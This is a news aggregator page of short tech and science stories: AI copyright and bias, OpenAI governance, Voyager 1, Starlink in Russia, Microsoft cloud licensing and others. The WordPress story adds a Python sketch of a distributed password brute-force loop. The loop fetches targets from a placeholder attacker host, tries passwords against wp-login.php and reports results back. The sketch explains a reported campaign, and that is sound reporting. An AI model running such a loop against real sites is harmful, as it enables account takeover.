posted by janrinok on Wednesday March 13 2024, @07:52PM   Printer-friendly

Google's swanky new "Bay View" campus apparently has a major problem: bad Wi-Fi. Reuters reports that Google's first self-designed office building has "been plagued for months by inoperable or, at best, spotty Wi-Fi, according to six people familiar with the matter." A Google spokesperson confirmed the problems and said the company is working on fixing them.

Bay View opened in May 2022. At launch, Google's VP of Real Estate & Workplace Services, David Radcliffe, said the site "marks the first time we developed one of our own major campuses, and the process gave us the chance to rethink the very idea of an office." The result is a wild tent-like structure with a striking roofline made up of swooping square sections. Of course, it's all made of metal and glass, but the roof shape looks like squares of cloth held up by poles—each square section has high points on the four corners and sags down in the middle. The roof is covered in solar cells and collects rainwater while also letting in natural light, and Google calls it the "Gradient Canopy."

According to one AI engineer assigned to the building, which also houses members of the advertising team, the wonky Wi-Fi has been no help as Google pushes a three-day-per-week return-to-office mandate.

"You'd think the world's leading internet company would have worked this out," he said. Like others, he spoke to Reuters on the condition of anonymity because Google has not authorized them to talk about work conditions.

Managers have encouraged workers to stroll outside or sit at the adjoining cafe where the Wi-Fi signal is stronger.


Original Submission

posted by janrinok on Wednesday March 13 2024, @03:04PM   Printer-friendly
from the there-are-too-many-AI-stories! dept.

[We have had several complaints recently (polite ones, not a problem) regarding the number of AI stories that we are printing. I agree, but that reflects the number of submissions that we receive on the subject. So I have compiled a small selection of AI stories into one and you can read them or ignore them as you wish. If you are making a comment please make it clear exactly which story you are referring to unless your comment is generic. The submitters each receive the normal karma for a submission. JR]

Image-scraping Midjourney bans rival AI firm for scraping images

https://arstechnica.com/information-technology/2024/03/in-ironic-twist-midjourney-bans-rival-ai-firm-employees-for-scraping-its-image-data/

On Wednesday, Midjourney banned all employees of image synthesis rival Stability AI from its service indefinitely after it detected "botnet-like" activity suspected to be a Stability employee attempting to scrape prompt and image pairs in bulk. Midjourney advocate Nick St. Pierre tweeted about the announcement, which came via Midjourney's official Discord channel.

[...] Siobhan Ball of The Mary Sue found it ironic that a company like Midjourney, which built its AI image synthesis models using training data scraped off the Internet without seeking permission, would be sensitive about having its own material scraped. "It turns out that generative AI companies don't like it when you steal, sorry, scrape, images from them. Cue the world's smallest violin."

[...] Shortly after the news of the ban emerged, Stability AI CEO Emad Mostaque said that he was looking into it and claimed that whatever happened was not intentional. He also said it would be great if Midjourney reached out to him directly. In a reply on X, Midjourney CEO David Holz wrote, "sent you some information to help with your internal investigation."

[...] When asked about Stability's relationship with Midjourney these days, Mostaque played down the rivalry. "No real overlap, we get on fine though," he told Ars and emphasized a key link in their histories. "I funded Midjourney to get [them] off the ground with a cash grant to cover [Nvidia] A100s for the beta."

Midjourney stories on SoylentNews: https://soylentnews.org/search.pl?tid=&query=Midjourney&sort=2
Stable Diffusion (Stability AI) stories on SoylentNews: https://soylentnews.org/search.pl?tid=&query=Stable+Diffusion&sort=2

NYT disputes OpenAI "hacking" claim by pointing to ChatGPT bypassing paywalls

https://arstechnica.com/tech-policy/2024/03/nyt-disputes-openai-hacking-claim-by-pointing-to-chatgpt-bypassing-paywalls/

Late Monday, The New York Times responded to OpenAI's claims that the newspaper "hacked" ChatGPT to "set up" a lawsuit against the leading AI company.

[...] OpenAI had argued that NYT allegedly made "tens of thousands of attempts to generate" supposedly "highly anomalous results" showing that ChatGPT would produce excerpts of NYT articles. [...] But while defending tactics used to prompt ChatGPT to spout memorized training data—including more than 100 NYT articles—NYT pointed to ChatGPT users who have frequently used the tool to generate entire articles to bypass paywalls.

According to the filing, NYT today has no idea how many of its articles were used to train GPT-3 and OpenAI's subsequent AI models, or which specific articles were used, because OpenAI has "not publicly disclosed the makeup of the datasets used to train" its AI models. Rather than setting up a lawsuit, NYT argued, it was prompting ChatGPT to discover evidence in an attempt to track the full extent of the tool's copyright infringement.

"In OpenAI's telling, The Times engaged in wrongdoing by detecting OpenAI's theft of The Times's own copyrighted content," NYT's court filing said. "OpenAI's true grievance is not about how The Times conducted its investigation, but instead what that investigation exposed: that Defendants built their products by copying The Times's content on an unprecedented scale—a fact that OpenAI does not, and cannot, dispute."

On an OpenAI community page, one paid ChatGPT user complained that OpenAI is "working against the paid users of ChatGPT Plus. This time they're taking away Browsing, because it reads the content of a site that the user asks for? Please, that's what I pay for Plus for."

"I know it's no use complaining, because OpenAI is going to increasingly 'castrate' ChatGPT 4," the ChatGPT user continued, "but there's my rant."

NYT argued that public reports of users turning to ChatGPT to bypass paywalls "contradict OpenAI's contention that its products have not been used to serve up paywall-protected content, underscoring the need for discovery" in the lawsuit, rather than dismissal.

NYT wants a court not only to award damages for profits lost due to ChatGPT's alleged infringement, but also to order a permanent injunction stopping ChatGPT from infringing. A win for NYT could mean OpenAI is forced to wipe ChatGPT and start over. That could perhaps spur OpenAI to build a new AI model based on licensed content—since OpenAI said earlier this year it would be "impossible" to create useful AI models without copyrighted content—which would ensure publishers like NYT always get paid for training data.

Previously on SoylentNews:
OpenAI Says New York Times 'Hacked' ChatGPT to Build Copyright Lawsuit - 20240301
Why the New York Times Might Win its Copyright Lawsuit Against OpenAI - 20240220
New York Times Sues Microsoft, ChatGPT Maker OpenAI Over Copyright Infringement - 20231228
Report: Potential NYT lawsuit could force OpenAI to wipe ChatGPT and start over - 20230821

Related stories on SoylentNews:
Microsoft in Deal With Semafor to Create News Stories With Aid of AI Chatbot - 20240206
AI Threatens to Crush News Organizations. Lawmakers Signal Change Is Ahead - 20240112
Writers and Publishers Face an Existential Threat From AI: Time to Embrace the True Fans Model - 20230415

LLMs Become More Covertly Racist With Human Intervention

LLMs become more covertly racist with human intervention:

Even when the two sentences had the same meaning, the models were more likely to apply adjectives like "dirty," "lazy," and "stupid" to speakers of African American English (AAE) than speakers of Standard American English (SAE). The models associated speakers of AAE with less prestigious jobs (or didn't associate them with having a job at all), and when asked to pass judgment on a hypothetical criminal defendant, they were more likely to recommend the death penalty.

An even more notable finding may be a flaw the study pinpoints in the ways that researchers try to solve such biases.

To purge models of hateful views, companies like OpenAI, Meta, and Google use feedback training, in which human workers manually adjust the way the model responds to certain prompts. This process, often called "alignment," aims to recalibrate the millions of connections in the neural network and get the model to conform better with desired values.

The method works well to combat overt stereotypes, and leading companies have employed it for nearly a decade. If users prompted GPT-2, for example, to name stereotypes about Black people, it was likely to list "suspicious," "radical," and "aggressive," but GPT-4 no longer responds with those associations, according to the paper.
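The story doesn't spell out the mechanics, but the "feedback training" described above is, at bottom, preference optimization: human raters mark which of two model outputs is better, and the model is adjusted to score preferred outputs higher. Below is a minimal, self-contained sketch of that idea with a toy linear reward model; the dimensions, data, and learning rate are all illustrative, not taken from the paper or from any vendor's actual pipeline.

# Toy sketch of preference-based feedback training ("alignment").
# A linear reward model is fitted so preferred responses score higher
# than rejected ones (a Bradley-Terry pairwise objective). Everything
# here is illustrative; real systems tune billion-parameter networks.
import numpy as np

rng = np.random.default_rng(0)
dim = 8
w = np.zeros(dim)                       # reward-model weights

def reward(x):
    """Scalar reward for a response, represented as a feature vector."""
    return w @ x

# Hypothetical human-feedback data: (preferred, rejected) response pairs.
pairs = [(rng.normal(size=dim), rng.normal(size=dim)) for _ in range(100)]

lr = 0.1
for _ in range(50):
    for good, bad in pairs:
        # P(human prefers `good`) = sigmoid(reward(good) - reward(bad))
        margin = reward(good) - reward(bad)
        p = 1.0 / (1.0 + np.exp(-margin))
        w -= lr * (p - 1.0) * (good - bad)   # gradient step on -log P

The key limitation, as the next paragraph notes, is that this kind of tuning only corrects behaviors that raters actually flag.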

However, the method fails on the covert stereotypes that the researchers elicited when using African-American English in their study, which was published on arXiv and has not been peer reviewed. That's partially because companies have been less aware of dialect prejudice as an issue, the researchers say. It's also easier to coach a model not to respond to overtly racist questions than it is to coach it not to respond negatively to an entire dialect.

"Feedback training teaches models to consider their racism," says Valentin Hofmann, a researcher at the Allen Institute for AI and a coauthor on the paper. "But dialect prejudice opens a deeper level."

Avijit Ghosh, an ethics researcher at Hugging Face who was not involved in the research, says the finding calls into question the approach companies are taking to solve bias.

"This alignment—where the model refuses to spew racist outputs—is nothing but a flimsy filter that can be easily broken," he says.


Original Submission #1 | Original Submission #2 | Original Submission #3

posted by hubie on Wednesday March 13 2024, @10:22AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Russian troops in Ukraine have allegedly been using SpaceX’s Starlink terminals to get internet access during the ongoing war that has seen hundreds of thousands of casualties on each side. And now, House Democrats are finally asking hard questions of SpaceX leadership about how this could be happening, according to an open letter published on Thursday.

The letter to SpaceX president and COO Gwynne Shotwell from some top Democrats in the House makes the case that Starlink’s high-speed satellite internet access is considered essential to Ukraine’s continued ability to fight against Russia’s invasion, which first started in February 2022.

The letter from the Democrats, led by Rep. Jamie Raskin of Maryland and Rep. Robert Garcia of California, stresses that Russia’s use of Starlink tech would be “potentially in violation of U.S. sanctions and export controls.”

The Wall Street Journal was the first to report on February 15 that Russian troops have been using Starlink internet for “quite a long time,” according to Ukraine’s Lt. Gen. Kyrylo Budanov.

Russia is believed to be acquiring the Starlink terminals from black market sellers, sometimes posing as German appliance manufacturers, according to the Journal, but SpaceX leaders presumably have insight into who these illicit Russian actors are and how the terminals might be used. For example, Musk shut off Starlink access for Ukrainian-controlled devices in Crimea early in the war, ostensibly to stop an "escalation" of the conflict.


Original Submission

posted by hubie on Wednesday March 13 2024, @05:37AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

For more than 45 years, the Voyager 1 spacecraft has been cruising through the cosmos, crossing the boundary of our solar system to become the first human-made object to venture to interstellar space. Iconic in every regard, Voyager 1 has delivered groundbreaking data on Jupiter and Saturn, and captured the loneliest image of Earth. But perhaps nothing is lonelier than an aging spacecraft that has lost its ability to communicate while traveling billions of miles away from home.

NASA's Voyager 1 has been glitching for months, sending nonsensical data to ground control. Engineers at NASA's Jet Propulsion Laboratory (JPL) have been trying to resolve the issue, but given how far away the spacecraft currently is, the process has been extremely slow. Things are looking pretty bleak for the aging mission, which might be nearing its end. Still, NASA isn't ready to let go of its most distant spacecraft just yet.

“The team continues information gathering and are preparing some steps that they’re hopeful will get them on a path to either understand the root of the problem and/or solve it,” a JPL spokesperson told Gizmodo in an email.

The anomaly may have something to do with the spacecraft's flight data system (FDS). The FDS collects data from Voyager's science instruments, as well as engineering data about the health of the spacecraft, and combines them into a single package that is transmitted to Earth in binary code through one of the probe's subsystems, the telemetry modulation unit (TMU).

FDS and TMU, however, may be having trouble communicating with one another. As a result, TMU has been sending data to mission control in a repeating pattern of ones and zeroes.
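For illustration only, here is a toy sketch of the general idea of a flight-data-system frame: science and engineering readings combined into one binary package for downlink. The field layout, names, and values below are invented; Voyager's real telemetry format is far more elaborate.

# Toy sketch of an FDS-style telemetry frame: pack science and
# engineering readings into one binary blob for the radio downlink.
# Layout and values are invented for illustration.
import struct

science = [3.14, 2.71, 1.41]            # hypothetical instrument readings
engineering = {"bus_volts": 30.1, "temp_c": -35.5}

frame = struct.pack(
    ">H3f2f",                           # big-endian: frame counter + 5 floats
    42,                                 # hypothetical frame counter
    *science,
    engineering["bus_volts"],
    engineering["temp_c"],
)
print(frame.hex())                      # the ones and zeroes the TMU would send

A fault between the FDS and TMU, as described above, would be akin to this packing step emitting the same stuck pattern regardless of its inputs.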

Related:
    Humanity's Most Distant Space Probe Jeopardized by Computer Glitch
    Engineers Work to Fix Voyager 1 Computer


Original Submission

posted by hubie on Wednesday March 13 2024, @12:56AM   Printer-friendly
from the everything-is-fine dept.

https://arstechnica.com/information-technology/2024/03/openai-ceo-sam-altmans-conduct-did-not-mandate-removal-says-independent-review/

On Friday afternoon Pacific Time, OpenAI announced the appointment of three new members to the company's board of directors and released the results of an independent review of the events surrounding CEO Sam Altman's surprise firing last November. The current board expressed its confidence in the leadership of Altman and President Greg Brockman, and Altman is rejoining the board.
[...]
The independent review, conducted by law firm WilmerHale, investigated the circumstances that led to Altman's abrupt removal from the board and his termination as CEO on November 17, 2023. Despite rumors to the contrary, the board did not fire Altman because they got a peek at scary new AI technology and flinched. "WilmerHale... found that the prior Board's decision did not arise out of concerns regarding product safety or security, the pace of development, OpenAI's finances, or its statements to investors, customers, or business partners."

Instead, the review determined that the prior board's actions stemmed from a breakdown in trust between the board and Altman.
[...]
Altman's surprise firing occurred after he attempted to remove Helen Toner from OpenAI's board due to disagreements over her criticism of OpenAI's approach to AI safety and hype. Some board members saw his actions as deceptive and manipulative. After Altman returned to OpenAI, Toner resigned from the OpenAI board on November 29.

In a statement posted on X, Altman wrote, "i learned a lot from this experience. one think [sic] i'll say now: when i believed a former board member was harming openai through some of their actions, i should have handled that situation with more grace and care. i apologize for this, and i wish i had done it differently."
[...]
After OpenAI's announcements on Friday, resigned OpenAI board members Toner and Tasha McCauley released a joint statement on X. "Accountability is important in any company, but it is paramount when building a technology as potentially world-changing as AGI," they wrote. "We hope the new board does its job in governing OpenAI and holding it accountable to the mission. As we told the investigators, deception, manipulation, and resistance to thorough oversight should be unacceptable."

Previously on SoylentNews:
Sam Altman Officially Back as OpenAI CEO: "We Didn't Lose a Single Employee" - 20231202
AI Breakthrough That Could Threaten Humanity Might Have Been Key To Sam Altman's Firing - 20231124
OpenAI CEO Sam Altman Purged, President Brockman Quits, but Maybe They'll All Come Back After All - 20231119


Original Submission

posted by janrinok on Tuesday March 12 2024, @08:12PM   Printer-friendly
from the all-about-that-bass dept.

Voice pitch preferences in a wide cross-cultural sample clarify evolutionary origins, with lower pitches seen as more attractive and formidable:

If you're looking for a long-term relationship or to boost your social status, lower your pitch, according to researchers studying the effects of voice pitch on social perceptions. They found that lower voice pitch makes women and men sound more attractive to potential long-term partners, and lower voice pitch in males makes the individual sound more formidable and prestigious among other men.

[...] "Vocal communication is one of the most important human characteristics, and pitch is the most perceptually noticeable aspect of voice," said David Puts, study co-author and professor of anthropology at Penn State. "Understanding how voice pitch influences social perceptions can help us understand social relationships more broadly, how we attain social status, how we evaluate others on social status and how we choose mates."

[...] The researchers found that women and men preferred lower-pitched voices when asked which voice they would prefer for a long-term relationship such as marriage. They also found that a lower male voice pitch made the individual sound more formidable, especially among younger men, and more prestigious, particularly among older men. Perceptions of formidability and prestige had a larger impact in societies with more relational mobility — where group members interact more often with strangers — and more violence.

[...] The fact that study participants across cultures perceived a lower male voice pitch as conferring formidability and high social status suggests that these characteristics were likely conferred to our ancestors as well, said Puts, who is co-funded by the Social Science Research Institute at Penn State. He likened the effect to that of Darth Vader's voice in the Star Wars franchise: no matter where the character goes in the galaxy, his low pitch is perceived as formidable because larger beings tend to produce lower frequencies.

"The findings suggest that deep voices evolved in males because our male ancestors frequently interacted with competitors who were strangers, and they show how we can use evolutionary thinking and research from nonhuman animals to predict and understand how our psychology and behaviors vary across social contexts, including cross-culturally," Puts said. "Male traits such as deep voices and beards are highly socially salient, but this new research shows that the salience of at least one of these traits varies in predictable ways across societies, and it suggests that others, such as beards, do too."

[...] "This study suggests that voice pitch is relevant to social perceptions across societies," Puts said. "But it also shows that the extent of our attention to voice pitch when making social attributions is variable across societies and responsive to relevant sociocultural variables. In a society where there's higher relational mobility and you have less direct information about your competitors, people appear to be more attentive to an easily identifiable, recognizable signal like voice pitch."

Journal Reference:
Aung, T., Hill, A. K., Hlay, J. K., et al. (2024). Effects of Voice Pitch on Social Perceptions Vary With Relational Mobility and Homicide Rate. Psychological Science. https://doi.org/10.1177/09567976231222288


Original Submission

posted by janrinok on Tuesday March 12 2024, @03:26PM   Printer-friendly
from the rising-stars dept.

https://phys.org/news/2024-03-hidden-star-sand-dune-mystery.html

Scientists have solved the mysterious absence of star-shaped dunes from Earth's geological history for the first time, dating one back thousands of years.

[...] Star dunes are massive sand dunes that owe their name to arms that spread from a central peak. These sand pyramids, which look like stars when viewed from above, are widespread in modern deserts including sand seas in Africa, Arabia, China, and North America.

The research reveals that the oldest parts of the base of the Moroccan dune are 13,000 years old. However, the discovery that it formed rapidly in the last thousand years surprised scientists, who had thought larger dunes were far older.

Believed to be the tallest dunes on Earth—with one in the Badain Jaran Desert in China reaching 300 meters high—star dunes are also found elsewhere in the solar system, on Mars and on Saturn's moon Titan.

Despite being common today, star dunes have almost never been found in the geological record. Their absence has bemused scientists as past deserts are a common part of the history of Earth, preserved in rocks deep underground.

Published in the journal Scientific Reports, the new study dated the foundations of a star dune in the southeast of Morocco known as Lala Lallia, meaning "highest sacred point" in the Berber language, to about 13,000 years old.

The dune sits in the Erg Chebbi area of the Sahara Desert close to the border with Algeria, an area featured in TV series like SAS Rogue Heroes and blockbuster films such as The Mummy and Sahara.

The research shows that the sand pyramid reached its current 100-meter height and 700-meter width due to rapid growth in the past thousand years as it shifted slowly to the west.

More information: C. S. Bristow et al, Structure and chronology of a star dune at Erg Chebbi, Morocco, reveals why star dunes are rarely recognised in the rock record, Scientific Reports (2024). DOI: 10.1038/s41598-024-53485-3


Original Submission

posted by janrinok on Tuesday March 12 2024, @10:42AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Attackers have transformed hundreds of hacked sites running WordPress software into command-and-control servers that force visitors’ browsers to perform password-cracking attacks.

A web search for the JavaScript that performs the attack showed it was hosted on 708 sites at the time this post went live on Ars, up from 500 two days ago. Denis Sinegubko, the researcher who spotted the campaign, said at the time that he had seen thousands of visitor computers running the script, which caused them to reach out to thousands of domains in an attempt to guess the passwords of usernames with accounts on them.

“This is how thousands of visitors across hundreds of infected websites unknowingly and simultaneously try to bruteforce thousands of other third-party WordPress sites,” Sinegubko wrote. “And since the requests come from the browsers of real visitors, you can imagine this is a challenge to filter and block such requests.”

Like the hacked websites hosting the malicious JavaScript, all the targeted domains are running the WordPress content management system. The script—just 3 kilobits in size—reaches out to an attacker-controlled getTaskURL, which in turn provides the name of a specific user on a specific WordPress site, along with 100 common passwords. When this data is fed into the browser visiting the hacked site, it attempts to log into the targeted user account using the candidate passwords. The JavaScript operates in a loop, requesting tasks from the getTaskURL, reporting the results to the completeTaskURL, and then performing the steps again and again.
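Sinegubko's description is detailed enough to sketch the control flow. In the sketch below, the getTaskURL/completeTaskURL names come from the article; the endpoints, field names, login URL, and success check are placeholder reconstructions, not the actual malware.

# Schematic reconstruction of the task loop described above.
# All URLs and field names are placeholders for illustration.
import requests

GET_TASK_URL = "https://attacker.example/getTask"            # placeholder
COMPLETE_TASK_URL = "https://attacker.example/completeTask"  # placeholder

while True:
    # Each task names one username on one WordPress site, plus ~100
    # candidate passwords.
    task = requests.get(GET_TASK_URL).json()
    hits = []
    for password in task["passwords"]:
        # The request comes from a real visitor's browser, which makes
        # it hard to distinguish from legitimate traffic.
        resp = requests.post(task["site"] + "/wp-login.php",  # assumed endpoint
                             data={"log": task["user"], "pwd": password})
        if resp.status_code == 200:      # crude success check; as noted below,
            hits.append(password)        # mostly false positives in practice
    # Report results, then loop back for the next task.
    requests.post(COMPLETE_TASK_URL, json={"task_id": task["id"], "hits": hits})

Note how weak a bare status-code check is, which matches what the researcher observed below: most 200 responses turned out to be false positives from non-standard site configurations.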

[...] With 418 password batches as of Tuesday, Sinegubko has concluded that the attackers are trying 41,800 passwords (418 batches × 100 passwords each) against each targeted site.

Sinegubko wrote:

The attack consists of five key stages that allow a bad actor to leverage already compromised websites to launch distributed brute force attacks against thousands of other potential victim sites.

So, how do attackers actually accomplish a distributed brute force attack from the browsers of completely innocent and unsuspecting website visitors? Let’s take a look at stage 4 in closer detail.

As of Tuesday, the researcher had observed "dozens of thousands of requests" to thousands of unique domains that checked for files uploaded by the visitor browsers. Most of those requests returned 404 web errors, an indication that logins using the guessed passwords had failed. Roughly 0.5 percent of cases returned a 200 response code, leaving open the possibility that some password guesses were successful. On further inspection, only one of the sites was compromised. The others were using non-standard configurations that returned the 200 response even for pages that weren't available.

Over a four-day span ending Tuesday, Sinegubko recorded more than 1,200 unique IP addresses that tried to download the credentials file. Of those, five addresses accounted for over 85 percent of the requests.


Original Submission

posted by janrinok on Tuesday March 12 2024, @05:59AM   Printer-friendly

https://phys.org/news/2024-03-birds-smart.html

Researchers at Ruhr University Bochum explain how it is possible for the small brains of pigeons, parrots and corvids to perform as well as those of mammals, despite their significant differences.

Since the late 19th century, it has been a common belief among researchers that high intelligence requires the high computing capacity of large brains. It was also thought that a cerebral cortex, as is typical of mammals, is necessary to analyze and link information in great detail.

Avian brains, by contrast, are very small and lack any structure resembling a cortex. Nevertheless, scientists showed that parrots and corvids are capable of planning for the future, forging social strategies, recognizing themselves in mirrors and building tools. These and similar aptitudes put them on a par with chimpanzees.
...
The authors of the study show that birds have developed four similar innovations for intelligence during their evolution, independently of mammals.

First, birds have many more nerve cells in their small brains than previously believed. Corvids in particular place this extra portion of computing capacity in those areas of the brain that are most important for cognition.

The second reason is that birds have a specialized brain structure that is similar to the prefrontal cortex in mammals and is crucial for abstraction and planning. This brain region is moreover exceptionally large in intelligent birds and mammals.

Third, birds and mammals alike have a system that uses the neurotransmitter dopamine to continuously feed back the quality of their decisions to the prefrontal system. As a result, the prefrontal computational processes continuously adapt to changing situations and to the success or failure of the individual's decisions.

Finally, birds have independently developed a very similar working memory to temporarily hold things in short-term memory. Like jugglers keeping many balls in the air at once, birds and mammals use a flexible activity pattern of their nerve cells to keep a lot of information active at the same time.

More information: Onur Güntürkün et al, Why birds are smart, Trends in Cognitive Sciences (2023). DOI: 10.1016/j.tics.2023.11.002


Original Submission

posted by janrinok on Tuesday March 12 2024, @01:13AM   Printer-friendly
from the If-you-want-it-done-right,-do-it-yourself! dept.

It's well known that Americans don't trust Chinese IT hardware. Well, guess what?

They don't trust ours either!

https://www.wsj.com/world/china/china-technology-software-delete-america-2b8ea89f

Can you blame them? It's got to the point I trust an Arduino - that I personally program - far more than anything out there.

I believe computers also follow the "Peter Principle". Each new update becomes more and more encrusted with layers of fix code; no matter how fast the CPU runs or how much memory one has, the "attack surface" grows so immense that deliberately hidden backdoors and "sleeper cell" code make vetting trusted code nearly impossible.

https://html.duckduckgo.com/html?q=peter%20principle

So the Chinese don't trust American IT. Gee, I don't trust it either!

I am sure the Chinese are really fed up with all the nebulous terms, conditions, disclaimers, hold-harmless clauses, copyright violation threats, and the risk of being given the Roku treatment: contracts written in such a manner that they can be changed after payment clears, enforced by code, forcing you to accept whatever new terms arrive or to write off your investment in the proprietary technology as a sunk cost.

If you need it done right, learn to do it yourself, or forever be under the control of someone else who does.

Another thing ... If you are strong enough, you can dictate the rules of the game too.


Original Submission

posted by janrinok on Monday March 11 2024, @08:32PM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

A group of cloud infrastructure providers in Europe has delivered an ultimatum to Microsoft: End the "unjustified feature and pricing discriminations against fair competition" or face legal action.

With 27 member organizations – including 26 headquartered in the region plus US-based AWS – Cloud Infrastructure Providers in Europe (CISPE) is a non-profit industry group based in Brussels. It filed a complaint against Microsoft with the EU's antitrust cops in November 2022.

That complaint laid out how Microsoft discounts its own software when bundled with its own Azure cloud services – meaning it is more expensive to run Redmond’s wares in rival clouds. The Windows goliath tried to settle the case out of court last May. CISPE told The Register Microsoft's offer was "paltry" and rejected it.

The parties recently resumed negotiations, and the timing of today's statement to The Register seems designed to ratchet up the pressure on Microsoft's lawyers to offer bigger concessions. CISPE told us it used the Azure Pricing Calculator to highlight the pricing disparity at the heart of the issue – see the table below, provided by CISPE.

It shows, if CISPE is right, that although a member of the cloud association – a rival of Azure – can offer remote desktop virtual machines at a lower cost per machine than Microsoft, the red tape put in place by Redmond leaves the competing provider worse off in comparison, potentially causing the rival to lose sales to Azure.

"According to the Azure Pricing Calculator with the multi-session capabilities allowed on Azure, a customer can run a typical virtual desktop implementation supporting 32 users using just three virtual machines," the group explained.

"The licensing restrictions on multi-session use of Microsoft software outside of Azure force CISPE members to provision 32 virtual machines – that is, ten times more machines – to support the same number of users. Even with lower-cost hardware (VM cost per hour), the cost of supporting 32 users for a CISPE member is 2.5 times higher than what Microsoft charges."

The dominance of Microsoft software in the enterprise means cloud infrastructure providers often need to accommodate customers' IT estates that inevitably include Office, Windows, and more. That's software Microsoft ensures is cheaper to run on Microsoft's Azure cloud compared to rivals, according to CISPE, hence that group's unhappiness.
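CISPE's actual price table isn't reproduced in this story, but the shape of the 32-user claim above is simple arithmetic: a rival can undercut Azure on price per VM-hour and still come out far more expensive once the 3-versus-32 VM licensing restriction is applied. The hourly prices below are made up purely to illustrate that.

# Illustrative arithmetic for CISPE's claim; prices are invented.
azure_vms, rival_vms = 3, 32            # VMs needed to serve 32 desktop users
azure_price, rival_price = 1.00, 0.25   # hypothetical USD per VM-hour

azure_cost = azure_vms * azure_price    # 3.00/hour on Azure
rival_cost = rival_vms * rival_price    # 8.00/hour on the rival cloud

print(f"{rival_cost / azure_cost:.1f}x")  # ~2.7x, in line with CISPE's "2.5 times"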

CISPE members are similarly upset about the price of service provider license agreements, arguing Microsoft charges double digit percentages more to run SQL Server Enterprise licensing on non-Azure servers. Again, here's a table from CISPE advancing those claims.

"These figures are just the tip of the iceberg," Francisco Mingorance, secretary general of CISPE, told The Register. "This data represents prima facie evidence that Microsoft is acting against fair competition.

"The unjustified feature and pricing discriminations imposed by Microsoft on its dominant software, Office and Windows, outside of Azure, squeeze the margins of rival cloud infrastructure providers, lock in customers and raise prices."

"It is clear that there is a straightforward competition case here and that if these unfair licensing practices are not immediately ended by Microsoft voluntarily, legal and regulatory action should swiftly follow," he declared.

[...] The EU anti-trust team and competition authorities at the US Federal Trade Commission are also running investigations into Microsoft's cloudy licensing offers.


Original Submission

posted by hubie on Monday March 11 2024, @03:43PM   Printer-friendly
from the complaints-department-5000-miles-> dept.

https://arstechnica.com/information-technology/2024/03/some-teachers-are-now-using-chatgpt-to-grade-papers/

In a notable shift toward sanctioned use of AI in schools, some educators in grades 3–12 are now using a ChatGPT-powered grading tool called Writable, reports Axios. The tool, acquired last summer by Houghton Mifflin Harcourt, is designed to streamline the grading process, potentially offering time-saving benefits for teachers. But is it a good idea to outsource critical feedback to a machine?
[...]
"Make feedback more actionable with AI suggestions delivered to teachers as the writing happens," Writable promises on its AI website. "Target specific areas for improvement with powerful, rubric-aligned comments, and save grading time with AI-generated draft scores." The service also provides AI-written writing-prompt suggestions: "Input any topic and instantly receive unique prompts that engage students and are tailored to your classroom needs."
[...]
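Writable's internals aren't public, so the following is only a generic sketch of what "rubric-aligned comments" and "AI-generated draft scores" might look like when built on the OpenAI API. The model name, rubric, and input file are placeholders.

# Hypothetical sketch of ChatGPT-assisted grading; not Writable's code.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

rubric = "Thesis (0-4), Evidence (0-4), Organization (0-4), Mechanics (0-4)"
essay = open("student_essay.txt").read()         # placeholder input

response = client.chat.completions.create(
    model="gpt-4o-mini",                         # placeholder model choice
    messages=[
        {"role": "system",
         "content": "Grade the essay against this rubric: " + rubric +
                    ". Return a draft score per criterion plus two "
                    "actionable comments. A teacher reviews before release."},
        {"role": "user", "content": essay},
    ],
)
print(response.choices[0].message.content)       # draft scores and comments

The "teacher reviews before release" instruction mirrors how such tools are positioned: the AI produces draft scores, and the human is supposed to stay in the loop.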
The reliance on AI for grading will likely have drawbacks. Automated grading might encourage some educators to take shortcuts, diminishing the value of personalized feedback. Over time, the augmentation from AI may allow teachers to be less familiar with the material they are teaching. The use of cloud-based AI tools may have privacy implications for teachers and students. Also, ChatGPT isn't a perfect analyst. It can get things wrong and potentially confabulate (make up) false information, possibly misinterpret a student's work, or provide erroneous information in lesson plans.
[...]
there's a divide among parents regarding the use of AI in evaluating students' academic performance. A recent poll of parents revealed mixed opinions, with nearly half of the respondents open to the idea of AI-assisted grading.

As the generative AI craze permeates every space, it's no surprise that Writable isn't the only AI-powered grading tool on the market. Others include Crowdmark, Gradescope, and EssayGrader. McGraw Hill is reportedly developing similar technology aimed at enhancing teacher assessment and feedback.

Related stories on SoylentNews:
SWOT Analysis of ChatGPT in Computer Science Education - 20240215
OpenAI Admits That AI Writing Detectors Don't Work - 20230911
An Iowa School District is Using ChatGPT to Decide Which Books to Ban - 20230817
A Jargon-Free Explanation of How AI Large Language Models Work - 20230805
Why AI detectors think the US Constitution was written by AI - 20230718
Dishonor Code: What Happens When Cheating Becomes the Norm? - 20230301
Amid ChatGPT Outcry, Some Teachers are Inviting AI to Class - 20230221
Seattle Public Schools Bans ChatGPT; District 'Requires Original Thought and Work From Students' - 20230119
ChatGPT Arrives in the Academic World - 20221219


Original Submission

posted by janrinok on Monday March 11 2024, @10:54AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Intel is on track to receive $3.5 billion in US CHIPS Act funding to produce advanced semiconductors for American military and intelligence programs.

The chipmaker has been a top contender for the cash, with rumors swirling since November that the x86 giant would receive anywhere from $3-$4 billion. This funding, siphoned from the overall $39 billion CHIPS and Science Act allotment, would presumably support the development of a "secure enclave," which we understand to be a separate production line dedicated to military chip production.

According to Bloomberg, the $3.5 billion will be disbursed over the next three years. The news was tucked away in a spending bill passed by the US House of Reps on Wednesday, and will cement Intel as the leading producer of silicon for the defense market.

However, it's not like Uncle Sam had much of a choice if it wanted to keep production of military silicon in the US. Intel is now the only American chipmaker producing leading-edge silicon domestically.

New York-based GlobalFoundries abandoned development of 7nm and smaller process tech back in 2018 in order to focus on more mature and niche process tech in areas like radio communications, imaging, optical, automotive, industrial, and IoT.

Even so, many of GlobalFoundries' processes have military applications, and the company is still in the early stages of delivering on a 10-year, $3.1 billion DoD contract, awarded last fall, to produce semiconductors for aerospace and defense applications.

That leaves Taiwan's TSMC and South Korea's Samsung Electronics, which are building fabs in Arizona and Texas, as the only other US producers of leading edge chips. However, in this case, it seems that the US government would rather entrust its secrets to American companies.


Original Submission

posted by hubie on Monday March 11 2024, @06:11AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

These are some of the latest disasters listed on the AI Incident Database – a website keeping tabs on all the different ways the technology goes wrong.

